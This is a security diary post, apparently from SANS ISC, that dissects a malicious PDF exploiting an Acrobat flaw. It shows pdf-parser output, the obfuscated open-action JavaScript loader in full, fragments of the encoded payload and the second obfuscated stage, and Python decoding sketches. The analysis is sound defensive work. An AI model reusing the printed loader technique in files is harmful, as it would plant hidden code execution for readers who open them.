Static analysis of malicious PDFs (Part #2)

Published: 2010-01-07
Last Updated: 2010-01-07 13:38:01 UTC
by Daniel Wesemann (Version: 1)
3 comment(s)

This sample came to us from ISC reader Joe, who reported that his Acrobat Reader had crashed with the error message "A 3D parsing error has occurred". The obfuscation approach used by this sample isn't brand new; this type has been around since about mid-December as far as we know. No matter: this ISC diary is not about breaking news, but about analysis technique.

$ md5sum bad.pdf
0045c97c4e9e44cac68bd85e197bfae2 bad.pdf
$ ls -al bad.pdf
-rw-r----- 1 daniel handlers 37275 2010-01-06 04:04 bad.pdf

This sample currently still stumps automated analysis tools like the usually excellent Wepawet, but this PDF is indeed malicious. Let's take a look, using Didier Stevens' pdf-parser.py as before.

$ pdf-parser.py -a bad.pdf
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 10
3: 7, 8, 10
/Action 1: 6
/Annot 2: 5, 9
/Catalog 1: 1
/Outlines 1: 2
/Page 1: 4
/Pages 1: 3

This document defines an "action" which triggers when the document is opened. The corresponding code is in section 6 of this PDF. Looking at this section, we see that this is indeed a JavaScript block, but the actual code resides in section 7.

$ pdf-parser.py -o 6 -f bad.pdf
obj 6 0
Type: /Action
Referencing: 7 0 R
[(2, '<<'), (2, '/Type'), (2, '/Action'), (2, '/S'), (2, '/JavaScript'), [...]

<<
/Type /Action
/S /JavaScript
/JS 7 0 R
>>


Continuing the quest, let's look at section 7:

$ pdf-parser.py -o 7 -f bad.pdf
obj 7 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '231'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, '\r\n')]

<<
/Length 231
/Filter /FlateDecode
>>

"var z; var y; \n var h = 'edvoazcl'; \n\t z = y = app[h.replace(/[aviezjl]/g, '')]; \n\t var tmp = 'syncAEEotScan'; y = 0; \t z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l )
;app[h.replace(/[czomdqs]/g, '')]( s);\n s = ''; z = 1;"


That's more like it! Here we actually get JavaScript code ... and this code is probably the reason why some of the automated analyzers fail: This isn't simple JavaScript. It makes use of Adobe Acrobat specific JavaScript objects and methods to refer to the currently loaded document (app.doc), to identify any "annotations" within this document (syncAnnotScan), to fetch the annotations on the first page (getAnnots), to read the "subject" of the first annotation into a variable, to turn that string into code (replace every z, h, y or g with %, then unescape), and finally to eval (run) the result.
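The string tricks in that script are easy to replay outside of Acrobat. The following Python sketch is only an illustration and not part of the original analysis: it applies the same character-class replacements that the JavaScript performs, with Python's re.sub standing in for String.replace, to show which names the script really reaches for. The helper name strip_chars is made up for this example.

```python
import re

def strip_chars(text, char_class):
    """Mimic JavaScript's text.replace(/[char_class]/g, '')."""
    return re.sub("[" + re.escape(char_class) + "]", "", text)

h = "edvoazcl"          # decoy string from object 7
tmp = "syncAEEotScan"   # second decoy string from object 7

first_name = strip_chars(h, "aviezjl")    # used as app[...]
second_name = strip_chars(h, "czomdqs")   # used as app[...](s)
method_name = tmp.replace("E", "n")       # used as z[...]()

print(first_name, second_name, method_name)  # doc eval syncAnnotScan
```

So the one decoy string 'edvoazcl' yields both "doc" and "eval", depending on which characters are stripped from it.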

When we ran pdf-parser.py -a above, it showed "/Annot 2: 5, 9", indicating two annotation sections, 5 and 9. This script accesses the first annotation, thus section 5. Looking into section 5, we see that it simply refers to section 8 ... and there, finally, we find the code block:

$ pdf-parser.py -o 8 -f bad.pdf

obj 8 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '8583'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, '\r\n')]

<<
/Length 8583
/Filter /FlateDecode
>>

'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y64y64y6cy50y54y63y71y63y30y5fy43y67y28y76
y34y32y73y5fy36y34y2cy20y56y5fy5fy4ay53y33y32y29y7by76y61y72y20y71y41y69y5fy45y44y20y3
dy20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y54y38y5fy32y72y5
[...etc...]


Two more stages of decoding await the analyst here. First, we have to untangle the above (substitute y with %, then unescape). The resulting JavaScript code is still obfuscated:

function ddlPTcqc0_Cg(v42s_64, V__JS32){var qAi_ED = arguments.callee;var T8_2r_twoNOkI = 0;var
Fyaf2_8v_c7i = 512;qAi_ED = qAi_ED.toString();try {if (app){T8_2r_twoNOkI = 3;T8_2r_twoNOkI--;}}
catch(e) { }var ad_____M = new Array();if (v42s_64) { ad_____M = v42s_64;} else {var jVhSGHs = 0;
[...etc...]
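The first decoding stage (substitute, then unescape) can be reproduced without running any of the attacker's JavaScript. The Python sketch below is an illustration under stated assumptions: it takes the first line of the stream from section 8, applies the same [zhyg] to % substitution that the script in section 7 performs, and uses urllib.parse.unquote as a stand-in for JavaScript's unescape. The function name decode_stage1 is made up, and unquote does not understand the %uXXXX form that unescape accepts, so other samples may need extra handling.

```python
import re
from urllib.parse import unquote

def decode_stage1(blob):
    """Replace the stand-in characters with '%' and percent-decode the result."""
    percent_encoded = re.sub(r"[zhyg]", "%", blob)
    # latin-1 maps each %XX to exactly one character, as unescape() does
    return unquote(percent_encoded, encoding="latin-1")

# First line of the decompressed stream of section 8, as printed by pdf-parser.py
sample = ("y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y64y64y6cy50y54y63y71"
          "y63y30y5fy43y67y28y76")

print(repr(decode_stage1(sample)))
```

For this one line the result is two CRLF pairs and a tab, followed by "function ddlPTcqc0_Cg(v", which is the start of the function in the listing above.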

Note how it makes use of "arguments.callee", an anti-debugging technique that we covered before. Also note how the code again depends on the presence of the "app" object, which is Adobe specific and won't exist in SpiderMonkey. All you have to do to get past this stage in SpiderMonkey is to first define the app variable (set it to anything you like, app=1 works fine), and then use your normal trick to get past the "arguments.callee" trap. I still like to use the copy of SpiderMonkey that I patched to print on every eval call.
 

Phew! Yes indeed. Considering the complexity of all this, it is probably no surprise that we are seeing such an increase of malware wrapped into PDFs ... and also no surprise that Anti-Virus tools are doing such a shoddy job at detecting these PDFs as malicious: It is darn hard. For now, AV tools tend to focus more on the outcome and try to catch the EXEs written to disk once the PDF exploit has succeeded. But given that more and more users no longer reboot their PC, and basically just put it into sleep mode between uses, the bad guys do not really need to strive for a persistent (on-disk) infection anymore. In-memory infection is perfectly "good enough" - the average user certainly won't reboot his PC between leisure surfing and online banking sessions. Anti-Virus tools that miss the exploit but hope to catch the EXE written to disk won't do much good in the near future.
 

 

 


Comments

Thank you for posting your analysis of this PDF document. I have been analyzing PDFs for the last few months and had not yet discovered how 'app.doc', 'syncAnnotScan', and 'getAnnots' tied in. I will agree that Wepawet is a great tool, but I have also experienced it not detecting a malicious PDF due to obfuscation techniques. To mitigate this, I have started going back to basics: using a hex editor. :) I have also observed the regex search/replace of an arbitrary string in the FlateDecode stream. This seems to be a popular technique. Has anyone discovered the source of the JavaScript variable obfuscation? I'm wondering if that is related to Metasploit-related payload generation in some way.

I recently read Didier Stevens' articles from Hakin9 magazine on malicious PDF analysis. Those, along with his PDF tools, are also great. Thanks again!
I didn't see this mentioned so I thought I'd post it: this vulnerability is CVE-2009-2990 and has been in use in the wild since early November.

Nice job guys.
You should really have a look at the Origami framework for PDF analysis. It does all sorts of decoding, it is written in Ruby, and it has a nice GUI:
http://security-labs.org/origami/
